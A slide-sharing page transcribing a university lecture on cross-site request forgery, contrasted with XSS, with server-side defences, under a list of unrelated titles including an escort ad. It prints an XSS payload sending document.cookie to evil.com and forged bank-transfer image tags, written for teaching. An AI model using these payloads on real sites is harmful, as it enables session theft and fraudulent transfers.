Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 

CSRF-Lecture13.pptx

  • 1. Cross-site Request Forgery (CSRF) Attacks Vijay Ganesh University of Waterloo Winter 2013
  • 2. Vijay Ganesh 2 Today’s Lecture Cross-site Request Forgery (CSRF) Attacks  What is a Cross-site Request Forgery (CSRF) attack?  How they differ from XSS attacks  Examples and potential for damage  Measures that do not work  Methods to prevent/protect against such attacks  Server-side to prevent CSRF attacks  Client-side to protect against CSRF attacks
  • 3. Vijay Ganesh 3 What is CSRF and Why Should you Care?  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Called the “sleeping giants of web vulnerabilities” - Zeller & Felten 2008  Sometimes also referred to as XSRF attacks, confused deputy, session riding,..  The percentage of CSRF is 20% of all Web vulnerabilities in 2012*  High profile attacks:  Ebay’s Korea website was attacked in 2008 with 18 million users lost personal information  Mexico bank attack in 2008 caused lost of account information * https://www.whitehatsec.com/resource/stats.html
  • 4. Vijay Ganesh 4 XSS vs. CSRF  CSRF (Cross-site request forgery)  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Examples: Transfer money out of user’s account, harvest user ids, compromise user accounts  XSS (Cross-site scripting)  Malicious website leverages bugs in trusted website to cause unwanted action on user’s browser (circumventing the same-origin policy)  Examples: Reading cookies, authentication information, code injection  Unlike XSS, which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser  Techniques that protect against XSS will not necessarily work for CSRF
  • 5. Vijay Ganesh 5 High-level View of How CSRF Works Reference: Zeller & Felten 2008
  • 6. Vijay Ganesh XSRF (aka CSRF): Summary Attack server Server victim User victim 1 2 4 Q: how long do you stay logged on to the Bank? slide 6
  • 7. slide 7 XSS: Cross-Site Scripting victim’s browser evil.com Access some web page <FRAME SRC= http://naive.com/hello.cgi? name=<script>win.open( “http://evil.com/steal.cgi? cookie=”+document.cookie) </script>> Forces victim’s browser to call hello.cgi on naive.com with this script as “name” GET/ hello.cgi?name= <script>win.open(“http:// evil.com/steal.cgi?cookie”+ document.cookie)</script> hello.cgi executed <HTML>Hello, dear <script>win.open(“http:// evil.com/steal.cgi?cookie=” +document.cookie)</script> Welcome!</HTML> Interpreted as Javascript by victim’s browser; opens window and calls steal.cgi on evil.com GET/ steal.cgi?cookie= Echoes user’s name: <HTML>Hello, dear … </HTML> hello.cgi naive.com
  • 8. Vijay Ganesh 8 CSRF Attack: Bank Example*  Transfer money from one account to another  When the “Continue” button is pressed, an http POST request is submitted by the user browser to the server (bank) Example courtesy https://www.whitehatsec.com
  • 9. Vijay Ganesh 9 CSRF Attack: Bank Example*  If the request was successful, $5,000 would be transferred from account “314159265” to account “01123581.”  What’s interesting is that many Web applications, such as transfer_funds.cgi, do not distinguish between parameters sent using GET or POST.  In other words, the same request with POST replaced with GET is completely legit as far as the server is concerned GET Example courtesy https://www.whitehatsec.com
  • 10. Vijay Ganesh 10 CSRF Attack: Bank Example*  Attacker website has an image with the above tag  The image forces the user’s browser a “forged request” with the specified URL, and if the customer is logged into the bank, money will be transferred from 314159265 to “1618”  The forged request is a GET request with body similar to the POST request Example courtesy https://www.whitehatsec.com
  • 11. slide 11 CSRF: Bank Example victim’s browser evil.com Access some web page <IMG SRC=http://webbank/transfer_funds. cgi? from=314159265&to=1618&amount =5000&date=11072006&re=0>unt= 5000&date=11072006&re=0> > Forces victim’s browser to call transfer.cgi on webbank.com without proper permissions POST/transfer.cgi?from= 314159265&to=01123581&a mount=5000 transfer.cgi executed GET/transfer.cgi?from= 314159265&to=01123581&a mount=5000 The image-tag from evil.com forces a FORGED GET request to be sent to Bank by victim’s browser. Transfer funds from one account to another transfer.cgi Webbank.com
  • 12. Vijay Ganesh 12 What can we Learn from the CSRF Bank Attack Example?  CSRF attack: When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Necessary condition for attack to take place  The user must be capable of executing “unwanted” actions on trusted website, i.e., have implicit authentication  The trusted website only checks that an action came from an authenticated user’s browser, and not the user itself (i.e., no way to check if user authorized the action)  The user must be social-engineered to visit malicious website during the authenticated session with the trusted website  In this particular example, the attacker had to know the “from” account number as well
  • 13. Vijay Ganesh 13 Can the use of SSL prevent CSRF?  Not necessarily  Goes back to implicit authentication  The user’s browser records session information when she is connected to trusted site the first time  Any subsequent requests sent by the browser are “helpfully” appended with session information  Username, password, or SSL certificates  Hence, SSL does not necessarily protect the user against CSRF  A sure shot way is for the user to authenticate every request. No implicit authentication. Such an approach will make browsers unusable
  • 14. Vijay Ganesh 14 POST request-based CSRF  In the bank example we saw the CSRF employed a forged GET request  It is possible to execute a CSRF with a POST request  Why care? Some sites only accept POST requests  Executing a POST-based CSRF requires JavaScript  Dynamically creates appropriate POST request
  • 15. Vijay Ganesh 15 Another Example: GET and POST CSRF • Actual attack discovered by Zeller and Felten on INGDirect.com • Multinational company with $62 Billion in assets and 4.1 million customers • The attack • Allowed an attacker to open additional accounts on behalf of a user and transfer funds from a user’s account to the attacker’s account • The bank site’s use of SSL didn’t prevent the attack • First published CSRF on a financial institution (2008)
  • 16. Vijay Ganesh 16 Ingdirect.com Attack: GET and POST CSRF • Step 0: • Assume user is already authenticated to ingdirect.com’s site, and visits evil.com controlled by attacker • Assume attacker has JavaScript on his evil.com, and JavaScript engine is enabled on user’s browser. JavaScript is needed to create POST requests • Step 1: The attacker creates checking account on behalf of the user • The attacker causes the user’s browser to visit ING’s “open new account” page using an SRC tag on an image on evil.com • A forged GET request to https://secure.ingdirect.com/myaccount/ INGDirect.html?command= gotoOpenOCA
  • 17. Vijay Ganesh 17 Ingdirect.com Attack: GET and POST CSRF • Step 2: Causes a “single” account to be created using an appropriate POST command that is generated by JavaScript loaded into user’s browser from evil.com • Step 3: The attacker chooses an arbitrary amount of money to initially transfer from the user’s savings account to the new, fraudulent account • A POST request to https://secure. ingdirect.com/myaccount/ INGDirect.html with the appropriate parameters • Step 4: The attacker causes the user’s browser to click the final “Open Account” button, causing ING to open a new checking account on behalf of the user using an appropriate POST • Step 5: The attacker adds himself as a payee to the user’s account, transfers money
  • 18. Vijay Ganesh 18 Preventing CSRF Server-side Protection  Allow GET request to only retrieve data and not modify data on the server  Require all POSTs requests to contain a pseudo-random value  Trusted site generates pseudo-random value R, and sets it as a cookie on user’s browser  Every form submission (POST) to include R  Request valid only if form value == cookie value
  • 19. Vijay Ganesh 19 Preventing CSRF Server-side Protection  Assume that the attacker cannot modify cookie values or read data sent from server to user (same origin policy), i.e., does not know R.  Hence, cannot forge appropriate requests through his evil.com website  We assume R is hash value of session credentials and some random data Sources: Zeller&Felten paper and https://www.whitehatsec.com/resource/stats.html
  • 20. Vijay Ganesh 20 XSS vs. CSRF  CSRF (Cross-site request forgery)  When a malicious website causes a user’s browser to perform unwanted actions on a trusted website  Leverages implicit authentication in user’s browser  XSS (Cross-site scripting)  Malicious website leverages bugs in trusted website to cause unwanted action on user’s browser (circumventing the same-origin policy)  Leverages bugs on naïve.com  Techniques that protect against XSS: filter content posted on websites for scripts.  Does not directly help protect against CSRF. Why?  If site is vulnerable to XSS, it is vulnerable to CSRF  Why? Session credentials can be stolen using XSS, and then launch a CSRF.